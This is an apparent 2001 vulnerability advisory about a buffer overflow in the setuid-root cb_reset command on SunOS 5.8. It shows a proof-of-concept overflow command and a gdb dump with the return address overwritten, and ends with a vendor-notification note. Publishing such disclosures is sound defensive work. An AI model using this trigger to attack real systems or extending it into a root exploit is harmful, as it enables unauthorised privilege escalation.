COMMAND
/opt/SUNWssp/bin/cb_reset
SYSTEMS AFFECTED
SunOS 5.8 (at least)
PROBLEM
Pablo Sor found following. A problem with the cb_reset setuid
root command included in the SUNWssp package (not in the standard
install), results in a buffer overflow and potentially the
execution of arbitraty code. Due to the insufficient handling of
input parameter, a buffer overflow at 600 characters makes it
possible to overwrite variables on the stack including the return
address. Vulnerable packages/systems are SunOS 5.8 (have not
tested on other version).
$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
$ ls /tftpboot/cb_port
/tftpboot/cb_port
$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)
$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.
[...]
Loaded symbols for /usr/lib/nss_files.so.1
#0 0x1219c in cb_send_frame ()
(gdb) info registers
g0 0x0 0
g1 0xff195b80 -15115392
g2 0xff322630 -13490640
g3 0xff332d78 -13423240
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x13278 78456
o1 0xff1bbab8 -14959944
o2 0xff1b8018 -14974952
o3 0x13278 78456
o4 0x13258 78424
o5 0xffbedb71 -4269199
sp 0xffbedb18 -4269288
o7 0x1218c 74124
l0 0xc3c3c3c3 -1010580541
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x4141414d 1094795597
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585 (***)
y 0xb 11
psr 0xfe801001 -25161727
wim 0x0 0
tbr 0x0 0
pc 0x1219c 74140
npc 0x121a0 74144
fpsr 0x0 0
cpsr 0x0 0
(gdb)
SOLUTION
Sun Microsystems was notified on June 12, 2001. Patches are
excepted shortly.